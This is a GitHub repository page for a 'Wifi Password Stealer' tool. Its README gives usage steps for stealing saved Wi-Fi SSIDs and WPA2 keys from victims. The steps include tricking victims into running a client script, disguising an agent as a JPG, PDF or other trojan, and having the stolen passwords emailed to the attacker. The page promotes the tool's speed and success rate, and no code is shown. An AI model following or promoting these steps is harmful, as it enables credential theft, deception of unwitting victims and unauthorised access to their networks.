Skip to content

GibJaf/Wifi_Password_Stealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

28 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Wifi Password Stealer

Description

  • To retrieve ssid and wifi passwords stored on another device.
  • Can be used to penetrate target network without having to capture 4-way handshake and then trying to crack it.

Requirements

Python3.6

How to use


Local Network
  1. Start server application on your machine : python server.py
  2. Social engineer the victim to download the client file and run using python3.6 : python client.py
  3. A file of mac address of victim as name containing ssid and WPA2_PSk
    will be generated in victims folder
  4. Server will autoamatically create Wordlist by extracting unique PSK from all victim files
  5. To search for password for a certain SSID : python search.py

Across Internet
  1. Enable 2 step verification in your gmail account and generate app password . Also works with regular password
  2. Generate agent.py file as mail_password.py -e and -p
  3. Social engineer the victim to execute the file agent.py by hiding within a JPG,PDF or whatever trojan you prefer
  4. That's it . The SSID and passwords will be emailed to you :)

Disadvantage of 4-way handshake cracking
  1. Cracking the 4-way handshake can be a very time-consuming process
  2. It has a low success rate .
  3. You need to have correct password in your wordlist
  4. To speeden up the process requires expensive GPUs
Advantage of Wifi_Password_Stealer
  1. Works very fast .
  2. Almost 100% success rate
  3. No need to know or guess the correct password
  4. No need of expensive GPUs
  5. Cross-platform . Works on Linux and Windows . MacOS support coming soon
Contact
gibraan.jafar@viit.ac.in

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages